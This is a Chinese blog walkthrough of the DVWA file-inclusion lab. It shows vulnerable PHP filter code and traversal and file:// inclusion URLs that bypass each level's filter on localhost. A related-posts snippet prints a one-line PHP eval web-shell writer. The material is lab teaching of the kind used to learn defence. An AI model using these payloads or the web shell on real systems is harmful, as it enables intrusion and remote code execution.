DVWA(4)文件包含(File Inclusion) LOW-HIGHT 操作记录

已于 2022-11-08 21:10:30 修改
阅读量730 收藏
点赞数 1
文章标签: 安全 php 开发语言
于 2022-11-08 21:09:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lllllaaa111/article/details/127758484
版权

今天带来第四期文件包含漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。

php文件包含分为两种:

本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含

远程文件包含RFI(Remote File Inclusion) 当被包含的文件在第三方服务器时,叫做远程文件包含

Low级别

本地文件包含方法:

分别点击三个php文件,后缀为page=文件名

 将后缀修改为,得到了绝对路径

phpinfo.php

                                                                  远程文件包含方法:

编写一句话木马文档,命名为webshell.txt

<?php phpinfo();?>

利用文件上传的原理

 将后缀命改为

http://127.0.0.1/vulnerabilities/fi/?page=../../hackable/uploads/webshell.txt

 Medium级别

分析源码,将../ ..\过滤,我们可以使用.../代替


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

将后缀修改为

​
http://127.0.0.1/vulnerabilities/fi/?page=..././..././hackable/uploads/webshell.txt

​

Hight级别 

分析源码,要求page参数为file形式


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

在G盘下新建一个文件,命名为webshell.php  内容为:

<?php phpinfo();?>

将后缀名修改为

http://127.0.0.1/vulnerabilities/fi/?page=file://G:/webshell.php

lllllaaa111
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 659
DVWA靶机的文件包含详细教学
PHP代码审计DVWA-文件包含信息获取方法
weixin_54882883的博客
08-18 422
如果说都不知道他里面有哪些文件的话,就比较麻烦了,首先可以通过报错来看他里面有哪些具体路径,报错的话就是包含一个他不存在的文件就可以了,如果是连报错都好了。首先就是一个方便,当A文件需要B文件的时候就直接通过文件包含,包含B文件就可以,直接把B文件调用过来,这样就不用去编写代码了。那么当A文件需要B文件的时候,就包含B文件就可以了,当A文件需要C文件就包含C文件就可以了,对于严重程度来是,虽然两个都是文件包含漏洞,但是呢,远程文件包含漏洞要更严重些。那么A文件里面设置了文件包含的函数。......
DVWA学习日记-4 文件包含
qq_29010757的博客
11-21 459
文件包含 举例: 有个骗子卖东西,以次充好,以假乱真,这就是在三十六计里面的偷梁换柱 在文件包含漏洞里面的文件,把真正的文件调包换成我们的恶意文件,服务器却还不知道 概述: 文件包含其实就一种代码的处理方法,当一个代码文件想要引用另一个代码文件就会利用到包含,常见的函数有:include,require等,参数一般是代码文件名 文件名参数用户可控且过滤不严,被攻击者偷梁换柱 文件包含 includ...
DVWA-Low通关详解
hxhxhxhxx的博客
09-12 954
DVWA-Low通关详解Brute Force(暴力破解)Command injection(命令执行)前情提要Cross Site Request Forgery(CSRF跨站脚本伪造)File Inclusion文件包含fileupload 文件上传Insecure CAPTCHA(不安全的验证码)SQL Injection(SQL注入)SQL Injection (Blind)(SQL注入盲注)基于布尔的盲注基于时间的盲注Reflected Cross Site Scripting(XSS)(反射
DVWA靶机通关记-LOW
qq_35258210的博客
01-23 274
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 1、sql注入 2、sql盲注 3、反射型xss 4、存储型xss 5、命令执行 6、文件上传 7、文件包含 8、CSRF跨站请求伪造 9
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。...帮助web开发人员理解web应用保护的过程,还可以在课堂中为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
DVWA初级(low)通关教程
weixin_52029251的博客
04-25 208
Brute Force(暴力破解) 抓包重发到Intruder 选择攻击模式为Cluster bomb,并选中输入的账号和密码 接下来暴力破解 接下来就是慢慢跑了 Command Injection(命令注入) 输入我的IP地址ping通之后有回显 查看源码发现没有将拼接符禁用 开始命令注入 成功! File Inclusion文件包含漏洞) 点击file1.php ...
DVWA笔记:利用文件包含漏洞(低级)获取webshell
m0_47470899的博客
01-28 1476
DVWA文件包含漏洞(远程文件包含) 一、利用kali虚拟机建立服务器,并建立x.txt文件作为远程上传文件: 1、开启kali服务器,输入命令 service apache2 start 2、建立x.txt,在/var/www/html/目录下创建,内容为: <?fputs(fopen("shell60.php","w"),'<?php eval($_POST[moxi]);?>')?> 该代码执行时,将会创建一个名为shell60.php的一句话木马文件。后期通过菜刀软件连
DVWA通关攻略之文件包含
勿山几已
05-18 1533
简单介绍文件包含漏洞,并基于DVWA演示利用方式
DVWA--文件包含
孤的博客
11-23 1030
PHP中存在文件包含漏洞的前提,在php.ini中allow_url_fopen=on、allow_url_include=on才行,不过一般allow_url_fopen都默认设置的是on。 LOW 能看到配置参数的变化: 如果我们改一个不存在的文件 http://localhost/DVWA/vulnerabilities/fi/index.php?page=new.php ...
DVWA——文件包含
最新发布
m0_74426634的博客
04-06 1339
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
DVWA靶场文件包含low
qq_14902381的博客
08-15 962
dvwa靶场文件包含漏洞
DVWA文件包含漏洞(file inclusion
kirito_pio的博客
06-05 1008
文件包含漏洞是在主机要执行的文件中添加包含木马的文件。 low级别和medium级别分别有远程文件包含(RFI)和本地文件包含(LFI),high级别使用了白名单,无法绕过。 1、low级别 1.1 本地文件包含 在https://blog.csdn.net/kirito_pio/article/details/106547336中,完成了对各个级别的文件上传,但是在执行high级别时只进行了上传,不能使用菜,因为图片是静态的文件,不能自己执行,需要等待请求。 图片中包含的一句话脚本如下,可以..
文件包含漏洞利用(低中高级)
m0_73128456的博客
11-12 369
低级(Low):因为低级,所以代码对包含文件没有进行任何的过滤,这导致我们可以进行包含任何文件。如果直接包含一个不存在的文件ming.php,会发生报错,但是它会把dvwa这个网站的路径给暴露出来。就可以查看文件了,这里只可以看文件,不可以看网站,如淘宝.百度等。我这里是因为我查看的是图片,所以它是以十六进制表示的。,我们可以成功把淘宝的页面包含到dvwa的页面里面来。就可以成功把淘宝的页面包含到dvwa的页面里面来。高级(High):我们可以利用file://即可实现绕过,如网址。
2. DVWA亲测文件包含漏洞
weixin_30740295的博客
05-14 286
Low级: 我们分别点击这几个file.php文件 仅仅是配置参数的变化: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file3....
DVWA】--- 四、文件包含(File Inclusion)
qq_43168364的博客
05-31 451
sh
DVWA靶场--文件上传/包含(low-high).
Polaroid2的博客
10-12 488
仅用于技术分享。
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
05-17
是一种常见的Web应用程序漏洞,攻击者可以通过该漏洞在Web应用程序中包含外部文件,从而访问敏感信息或执行恶意代码。DVWA(Damn Vulnerable Web Application)是一个专门用于漏洞测试的Web应用程序,其中包含了一些常见的Web安全漏洞,包括文件包含漏洞。 在DVWA中,文件包含漏洞主要存在于以下两个文件中: 1. /dvwa/vulnerabilities/fi/index.php 2. /dvwa/vulnerabilities/fi_base64/index.php 攻击者可以通过构造恶意请求,将要包含的文件路径作为参数传递给上述文件中的一个或多个参数,从而实现文件包含。如果攻击者能够成功包含恶意文件,就可以执行任意代码,进而控制Web应用程序或服务器。 为了防止文件包含漏洞,可以采取以下措施: 1. 避免使用用户输入来构造文件路径参数。 2. 对用户输入进行严格的输入验证和过滤。 3. 使用白名单机制来限制可以包含的文件路径。 4. 对文件路径进行加密或编码,以避免攻击者能够轻易地构造恶意请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值